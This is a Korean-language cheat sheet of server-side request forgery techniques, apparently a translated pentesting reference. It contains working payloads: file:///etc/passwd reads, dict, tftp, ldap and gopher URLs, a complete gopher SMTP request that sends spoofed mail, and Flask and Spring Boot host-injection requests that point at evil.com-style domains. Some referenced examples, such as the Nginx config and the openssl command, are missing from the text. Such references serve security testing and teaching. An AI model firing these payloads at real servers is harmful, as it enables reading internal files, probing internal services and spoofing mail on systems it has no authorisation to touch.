보통 SSRF는 특정 화이트리스트 도메인이나 URL에서만 작동합니다. 다음 페이지에서는 그 화이트리스트를 우회하기 위한 기술 모음을 제공합니다:
오픈 리디렉션을 통한 우회
서버가 제대로 보호되어 있다면 웹 페이지 내의 오픈 리디렉션을 이용하여 모든 제한을 우회할 수 있습니다. 웹 페이지는 **같은 도메인에 대한 SSRF를 허용하고 아마도 리디렉션을 따를 것입니다, 오픈 리디렉션을 이용하여 서버가 내부의 어떤 리소스에 접근하도록 할 수 있습니다.
자세한 내용은 여기에서 읽어보세요: https://portswigger.net/web-security/ssrf
프로토콜
file://
URL 스킴 file://가 참조되며, /etc/passwd를 직접 가리킵니다: file:///etc/passwd
dict://
DICT URL 스킴은 DICT 프로토콜을 통해 정의나 단어 목록에 접근하는 데 사용됩니다. 특정 단어, 데이터베이스 및 항목 번호를 목표로 하는 URL을 구성한 예가 제공되며, 공격자가 제공한 자격 증명을 사용하여 DICT 서버에 연결하기 위해 PHP 스크립트가 잘못 사용될 수 있는 경우를 설명합니다: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
SFTP://
보안 셸을 통한 안전한 파일 전송 프로토콜로 확인되며, 악성 SFTP 서버에 연결하기 위해 PHP 스크립트를 악용하는 방법을 보여주는 예가 제공됩니다: url=sftp://generic.com:11111/
TFTP://
UDP를 통해 작동하는 트리비얼 파일 전송 프로토콜이 언급되며, TFTP 서버에 요청을 보내기 위해 설계된 PHP 스크립트의 예가 제공됩니다. 'generic.com'의 포트 '12346'에 대해 파일 'TESTUDPPACKET'에 대한 TFTP 요청이 이루어집니다: ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
LDAP://
이 섹션에서는 경량 디렉터리 접근 프로토콜을 다루며, IP 네트워크를 통해 분산 디렉터리 정보 서비스 관리 및 접근에 사용됩니다. 로컬호스트에서 LDAP 서버와 상호작용: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
SMTP
SSRF 취약점을 악용하여 로컬호스트의 SMTP 서비스와 상호작용하는 방법이 설명되며, 내부 도메인 이름을 드러내고 그 정보를 기반으로 추가 조사 작업을 수행하는 단계가 포함됩니다.
From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect
Curl URL globbing - WAF 우회
SSRF가 curl에 의해 실행되는 경우, curl에는 WAF를 우회하는 데 유용할 수 있는 URL globbing이라는 기능이 있습니다. 예를 들어 이 writeup에서 file 프로토콜을 통한 경로 탐색에 대한 예제를 찾을 수 있습니다:
Gopher 프로토콜이 서버 통신을 위해 IP, 포트 및 바이트를 지정할 수 있는 기능과 페이로드를 작성하기 위한 Gopherus 및 remote-method-guesser와 같은 도구에 대해 논의합니다. 두 가지 뚜렷한 사용 사례가 설명됩니다:
Gopher://
이 프로토콜을 사용하면 서버가 전송할 IP, 포트 및 바이트를 지정할 수 있습니다. 그런 다음, 기본적으로 SSRF를 이용하여 모든 TCP 서버와 통신할 수 있습니다(하지만 먼저 서비스와 대화하는 방법을 알아야 합니다).
다행히도, Gopherus를 사용하여 여러 서비스에 대한 페이로드를 생성할 수 있습니다. 또한, remote-method-guesser를 사용하여 Java RMI 서비스에 대한 gopher 페이로드를 생성할 수 있습니다.
Gopher smtp
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT
고퍼 HTTP
#For new lines you can use %0A, %0D%0Agopher://<server>:8080/_GET /HTTP/1.0%0A%0Agopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
서버의 분석 소프트웨어는 종종 들어오는 링크를 추적하기 위해 Referrer 헤더를 기록하며, 이로 인해 애플리케이션이 Server-Side Request Forgery (SSRF) 취약점에 노출될 수 있습니다. 이는 이러한 소프트웨어가 Referrer 헤더에 언급된 외부 URL을 방문하여 추천 사이트 콘텐츠를 분석할 수 있기 때문입니다. 이러한 취약점을 발견하기 위해 Burp Suite 플러그인 "Collaborator Everywhere"를 사용하는 것이 권장되며, 이는 분석 도구가 Referer 헤더를 처리하는 방식을 활용하여 잠재적인 SSRF 공격 표면을 식별합니다.
SSRF via SNI data from certificate
간단한 설정을 통해 백엔드에 연결할 수 있게 하는 잘못된 구성은 예시 Nginx 구성으로 설명됩니다:
이 구성에서는 Server Name Indication (SNI) 필드의 값이 백엔드 주소로 직접 사용됩니다. 이 설정은 Server-Side Request Forgery (SSRF) 취약점을 노출시키며, SNI 필드에 원하는 IP 주소나 도메인 이름을 지정하는 것만으로도 악용될 수 있습니다. openssl 명령어를 사용하여 internal.host.com과 같은 임의의 백엔드에 연결을 강제하는 악용 예시는 아래와 같습니다:
</details>
Flask는 **`@`**를 초기 문자로 사용할 수 있게 하여 **초기 호스트 이름을 사용자 이름으로 만들고** 새로운 호스트 이름을 주입할 수 있게 합니다. 공격 요청:
```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close
Spring Boot
취약한 코드:
요청의 경로를 문자 **;**로 시작할 수 있다는 것이 발견되었으며, 이를 통해 **@**를 사용하고 새로운 호스트를 주입하여 접근할 수 있습니다. 공격 요청:
GET ;@evil.com/url HTTP/1.1Host:target.comConnection:close